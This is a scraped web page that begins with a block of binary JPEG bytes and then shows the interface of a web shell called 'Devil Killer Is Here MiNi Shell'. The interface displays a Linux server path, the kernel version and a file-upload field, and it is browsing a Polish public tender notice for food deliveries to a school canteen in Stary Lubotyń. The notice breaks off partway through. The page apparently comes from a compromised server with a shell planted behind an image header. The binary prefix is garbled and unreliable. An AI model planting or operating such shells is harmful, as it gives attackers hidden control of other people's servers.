JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251027/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251027/0049833601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa produktów żywnościowych do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Podstawowa im. Jana Pawła II - Papieża Polaka w Starym Lubotyniu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000640886</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Stary Lubotyń, 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stary Lubotyń</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-303</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">splubotyn@lubotyn.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.splubotyn.edupage.org</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">GMINA STARY LUBOTYŃ</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">7591624568</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Stary Lubotyń</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Stary Lubotyń</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">07-303</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">296446422</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">przetaergi@lubotyn.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://www.lubotyn.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa produktów żywnościowych do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-63629ec1-fdda-4429-8192-076f42e62fc5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00498336</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-27</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lubotyn <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1.	Zamawiający wymaga złożenia oferty pod rygorem nieważności w postaci elektronicznej, za pośrednictwem Platformy dostępnej pod adresem https://platformazakupowa.pl/pn/lubotyn<br/>2.	Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji elektronicznie na adres e-mail: przetargi@lubotyń.pl <br/>lub gmina@lubotyn.pl lub za pośrednictwem Platformy znajdującej się pod adresem: https://platformazakupowa.pl/pn/lubotyn</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	W celu skrócenia czasu udzielenia odpowiedzi na pytania komunikacja między zamawiającym a wykonawcami w zakresie:<br/>	przesyłania Zamawiającemu pytań do treści SWZ;<br/>	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia podmiotowych środków dowodowych;<br/>	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia/poprawienia/uzupełnienia oświadczenia, o którym mowa w art. 125 ust. 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dotyczących treści oświadczenia, o którym mowa w art. 125 ust. 1 lub złożonych podmiotowych środków dowodowych lub innych dokumentów lub oświadczeń składanych w postępowaniu;<br/>	przesyłania odpowiedzi na wezwanie Zamawiającego do złożenia wyjaśnień dot. treści przedmiotowych środków dowodowych;<br/>	przesłania odpowiedzi na inne wezwania Zamawiającego wynikające z ustawy - Prawo zamówień publicznych;<br/>	przesyłania wniosków, informacji, oświadczeń Wykonawcy;<br/>	przesyłania odwołania/inne<br/>odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”. <br/>Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>2.	Zamawiający będzie przekazywał wykonawcom informacje za pośrednictwem platformazakupowa.pl. Informacje dotyczące odpowiedzi na pytania, zmiany specyfikacji, zmiany terminu składania i otwarcia ofert Zamawiający będzie zamieszczał na platformie w sekcji “Komunikaty”. Korespondencja, której zgodnie z obowiązującymi przepisami adresatem jest konkretny wykonawca, będzie przekazywana za pośrednictwem platformazakupowa.pl do konkretnego wykonawcy.<br/>3.	Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez zamawiającego, gdyż system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.<br/>4.	Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 31 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. 2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformazakupowa.pl, tj.:<br/>a)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>d)	włączona obsługa JavaScript,<br/>e)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f)	Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>g)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>Szczegółowe informacje w tym zakresie zawarte zostały w Rozdziale XV SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje dot. RODO zawiera załącznik nr 5 do SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SP.271.1.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa artykułów ogólnospożywczych do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15800000-6 - Różne produkty spożywcze</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa jaj i nabiału do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa mrożonek do stołówki w Szkole Podstawowej im. Jana Pawła II – Papieża Polaka w Starym Lubotyniu </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15896000-5 - Produkty głęboko mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15331170-9 - Warzywa mrożone</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1) Zamawiający przewiduje możliwość zastosowania prawa opcji:<br/>a) zmniejszającej w ramach poszczególnych pozycji z asortymentu – do 30%<br/>wartości zamówienia podstawowego<br/>b) zwiększającej w ramach poszczególnych pozycji z asortymentu – do 30% wartości zamówienia podstawowego.<br/>2) Zamawiający zastrzega sobie możliwość skorzystania z prawa opcji (w całości lub w części:<br/>a) zmniejszającej – w przypadku, gdy absencja uczniów w czasie trwania roku<br/>szkolnego okaże się większa lub ilość uczniów korzystających ze stołówki będzie mniejsza niż w roku ubiegłym lub zmian w<br/>sposobie żywienia dzieci, zmian wprowadzonych w menu lub uzasadnionych okoliczności, to jest stanu<br/>epidemicznego lub innych zdarzeń spowodowanych epidemią, w szczególności takich jak zawieszenie zajęć w szkole,<br/>zamknięcie szkoły, itp, co wpłynie na zmniejszenie zapotrzebowania na produkty żywnościowe w stosunku do ilości<br/>przewidywanych;<br/>b) zwiększającej – w przypadku, gdy w okresie trwania umowy wyczerpaniu ulegnie zakres podstawowy i zakup dodatkowej<br/>ilości produktu będzie konieczny do prawidłowego spełnienia obowiązku żywienia uczniów.<br/>3) Prawo opcji jest jednostronnym uprawnieniem Zamawiającego, z którego może, ale nie ma obowiązku skorzystać w<br/>ramach realizacji przedmiotu zamówienia. W przypadku nie skorzystania przez Zamawiającego z prawa opcji Wykonawcy<br/>nie przysługują żadne roszczenia z tego tytułu.<br/>4) Jeżeli Zamawiający skorzysta z prawa opcji obowiązkiem umownym Wykonawcy jest wykonanie świadczenia w zakresie<br/>objętym wykorzystanym prawem opcji na warunkach takich jak zamówienie podstawowe.<br/>5) Zamawiający ma prawo wielokrotnie korzystać z prawa opcji zwiększającej po zrealizowaniu zakresu podstawowego<br/>zamówienia – jednak do wyczerpania maksymalnego zakresu prawa opcji.<br/>6) Uruchomienie opcji nie będzie wymagało zmiany umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2026-01-01 do 2026-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający wybierze najkorzystniejszą ofertę spośród nieodrzuconych ofert, na podstawie następujących kryteriów:<br/>cena ofertowa brutto (C) – waga 100% (maksymalnie 100 punktów);</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszej części zamówienia jest sukcesywna dostawa ryb do stołówki w Szkole 